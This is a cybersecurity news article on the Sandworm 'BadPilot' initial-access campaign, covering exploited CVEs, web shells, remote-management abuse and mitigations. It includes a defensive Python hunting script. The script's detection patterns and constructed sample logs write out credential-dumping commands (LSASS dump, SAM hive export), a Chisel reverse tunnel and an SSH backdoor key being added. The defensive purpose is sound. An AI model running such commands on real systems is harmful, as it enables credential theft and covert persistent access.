Russian Sandworm Exploits BadPilot Network for Cyber Operations
A subgroup of the Russian state-sponsored hacking collective APT44, known as ‘Seashell Blizzard’ and ‘Sandworm,’ has been waging an aggressive, multi-year cyber campaign against critical organizations and government entities. Dubbed ‘BadPilot,’ this operation has been actively targeting energy, oil and gas, telecommunications, shipping, and arms manufacturing sectors since at least 2021.
Reports indicate that this subgroup acts as a dedicated initial access facilitator, allowing other APT44 units with more advanced cyber capabilities to conduct post-compromise activities. The significance of this effort is underscored by its role in paving the way for large-scale cyber intrusions and destructive attacks.
The Expanding Targeting Scope
Initial observations of the subgroup’s operations indicate that they targeted Ukraine, Europe, Central and South Asia, and the Middle East, primarily focusing on critical sectors. However, following Russia’s invasion of Ukraine in 2022, BadPilot significantly increased its cyber assaults against critical infrastructure supporting Ukraine. These included government, military, transportation, and logistics sectors, with the primary objectives being intelligence collection, operational disruptions, and data destruction through wiper attacks.
By 2023, BadPilot expanded its reach, compromising networks across Europe, the United States, and the Middle East. In 2024, the threat actors have further widened their scope, focusing heavily on the United States, United Kingdom, Canada, and Australia, demonstrating an aggressive escalation in cyber operations.
Initial Access Techniques and Exploited Vulnerabilities
The BadPilot subgroup employs a variety of techniques to infiltrate targeted networks, leveraging:
- Exploiting n-day vulnerabilities in internet-facing infrastructure
- Credential theft through phishing and social engineering
- Supply chain attacks targeting managed IT service providers
Supply-chain attacks have proven to be particularly effective in Ukraine and Europe, where hackers compromised IT service providers, gaining access to multiple downstream clients. Observations indicate that BadPilot has exploited vulnerabilities such as:
- CVE-2021-34473 (Microsoft Exchange)
- CVE-2022-41352 (Zimbra Collaboration Suite)
- CVE-2023-32315 (Openfire)
- CVE-2023-42793 (JetBrains TeamCity)
- CVE-2023-23397 (Microsoft Outlook)
- CVE-2024-1709 (ConnectWise ScreenConnect)
- CVE-2023-48788 (Fortinet FortiClient EMS)
Once initial access is obtained, the hackers establish persistence using custom web shells such as ‘LocalOlive.’ Additionally, in 2024, they began leveraging legitimate IT remote management tools like Atera Agent and Splashtop Remote Services to execute commands while impersonating IT administrators, effectively evading detection.
Post-Compromise Activity and Network Persistence
Following successful intrusion, the attackers employ various techniques for credential theft and data exfiltration:
- Credential Theft: Using Procdump or Windows registry access
- Data Exfiltration: Utilizing Rclone, Chisel, and Plink to create covert network tunnels
- Traffic Obfuscation: In 2024, attackers started routing traffic through the Tor network to mask inbound connections, making it difficult for security teams to track activity.
Lateral movement is a crucial aspect of BadPilot’s operations, as the hackers attempt to infiltrate as many parts of the network as possible. They modify critical infrastructure by:
- Manipulating DNS configurations
- Creating new services and scheduled tasks
- Configuring backdoor access using OpenSSH with unique public keys
These activities ensure sustained access for future attacks while complicating remediation efforts by cybersecurity teams.
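The post-compromise tooling and persistence behaviours listed above are exactly the kind of thing a hunting query looks for in process-creation telemetry. The following is an added example, not code from the original article or from any vendor report: it runs a handful of pattern rules over constructed Windows process-creation records (field names modelled on Sysmon Event ID 1, and the sample records themselves, are assumptions) and flags Procdump/registry credential dumping, Rclone/Chisel/Plink tunnelling, Tor, new services and scheduled tasks, SSH authorized_keys changes, and execution of the Atera/Splashtop agents the article says were abused.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    image: str      # full path of the started executable (assumed field)
    cmdline: str    # full command line as logged (assumed field)


# (rule name, regex applied to "<image> <cmdline>", case-insensitive).
# Illustrative patterns only; these are not the report's IoCs or YARA rules.
RULES = [
    # credential theft: LSASS dump via Procdump, or SAM/SECURITY/SYSTEM hive export
    ("cred_procdump_lsass", r"\bprocdump\S*\s.*\blsass\b"),
    ("cred_reg_hive_save", r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b"),
    # exfiltration / tunnelling tools named in the article, plus a Tor client binary
    ("tunnel_tool", r"\b(?:rclone|chisel|plink)(?:\.exe)?\b"),
    ("tor_client", r"[\\/]tor\.exe\b"),
    # persistence: new service, new scheduled task, or an SSH authorized key written
    ("persist_service_create", r"\bsc(?:\.exe)?\s+create\b"),
    ("persist_schtask_create", r"\bschtasks(?:\.exe)?\s+/create\b"),
    ("persist_ssh_authorized_keys", r"authorized_keys\b"),
    # legitimate RMM agents the article says were abused: flag for analyst review
    ("rmm_agent_exec", r"\b(?:ateraagent|splashtop)"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


def hunt(events):
    """Return (host, user, rule) triples for every event that matches a rule."""
    hits = []
    for ev in events:
        text = f"{ev.image} {ev.cmdline}"
        for name, rx in COMPILED:
            if rx.search(text):
                hits.append((ev.host, ev.user, name))
    return hits


# Constructed sample records (not real telemetry); the last one is benign.
SAMPLE = [
    ProcEvent("srv01", "CORP\\svc_it", r"C:\Temp\procdump64.exe", r"procdump64.exe -ma lsass.exe C:\Temp\l.dmp"),
    ProcEvent("srv01", "CORP\\svc_it", r"C:\Windows\System32\reg.exe", r"reg save HKLM\SAM C:\Temp\sam.hiv"),
    ProcEvent("ws07", "CORP\\jdoe", r"C:\Users\Public\chisel.exe", "chisel.exe client 192.0.2.10:8080 R:socks"),
    ProcEvent("srv02", "CORP\\svc_it", r"C:\Windows\System32\schtasks.exe", r"schtasks /create /tn Updater /tr C:\Temp\u.exe /sc onlogon"),
    ProcEvent("srv02", "CORP\\svc_it", r"C:\Windows\System32\cmd.exe", r"cmd /c echo ssh-ed25519 AAAA... >> C:\ProgramData\ssh\administrators_authorized_keys"),
    ProcEvent("ws03", "CORP\\asmith", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE /n"),
]

if __name__ == "__main__":
    for host, user, rule in hunt(SAMPLE):
        print(f"{host:6} {user:14} {rule}")
```

The RMM rule will fire on legitimate administrator activity too; in practice it is scoped with an allowlist of expected hosts and accounts so that only unexpected agent executions reach an analyst.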
Geopolitical Implications of BadPilot
The continued operations of BadPilot highlight the evolving nature of cyber warfare, with nation-state actors using cyber tools as a key component of their geopolitical strategies. Russia’s use of cyber tactics aligns with its broader military strategy, using cyberattacks as a force multiplier alongside conventional warfare.
Ukraine has been the most heavily targeted, but the campaign’s expansion to Western nations shows a clear intention to disrupt global operations, potentially influencing policy decisions and weakening international alliances. The targeting of industries such as telecommunications, energy, and military logistics suggests an effort to undermine economic and security infrastructures worldwide.
The Role of AI and Automation in Cyber Attacks
BadPilot has demonstrated increasing sophistication in its attack methodologies, incorporating AI-driven automation for reconnaissance and exploitation. Machine learning algorithms allow the hackers to rapidly identify and exploit vulnerabilities at scale, reducing the time needed for manual intrusion attempts. Automated attack frameworks also help obscure the origin of cyberattacks, making attribution and countermeasures more challenging for defenders.
Moreover, the use of AI in evasion techniques, such as dynamically altering attack signatures to bypass intrusion detection systems, underscores the need for enhanced cybersecurity measures leveraging AI-driven defense mechanisms.
Mitigation Strategies and Defensive Measures
To counter these threats, security teams have developed detailed hunting queries, indicators of compromise (IoCs), and YARA rules. These tools are designed to help detect and mitigate BadPilot-related threats before they escalate into full-blown cyber incidents. However, organizations must also adopt proactive security measures:
- Regular Patching and Vulnerability Management: Keeping software and infrastructure up to date to minimize exploitable vulnerabilities.
- Zero Trust Architecture: Implementing strict access controls to prevent unauthorized lateral movement within networks.
- Enhanced Threat Intelligence Sharing: Collaborating with industry partners and government agencies to stay ahead of emerging threats.
- AI-Driven Security Solutions: Leveraging machine learning for anomaly detection and real-time threat response.
- Employee Training and Awareness: Educating staff on phishing and social engineering tactics to reduce human-based vulnerabilities.
Conclusion
As APT44 continues refining its techniques and broadening its reach, organizations must remain vigilant against cyber threats. The BadPilot campaign exemplifies how nation-state actors exploit vulnerabilities and leverage automation to scale their attacks globally. By implementing proactive cybersecurity measures and fostering international cooperation, defenders can mitigate the impact of these cyber threats and protect critical infrastructure from disruption.
About the Creator
WIRE TOR - Ethical Hacking Services
WIRE TOR is a Cyber Intelligence Company that Provides Pentest & Cybersecurity News About IT, Web, Mobile (iOS, Android), API, Cloud, IoT, Network, Application, System, Red teaming, Social Engineering, Wireless, And Source Code.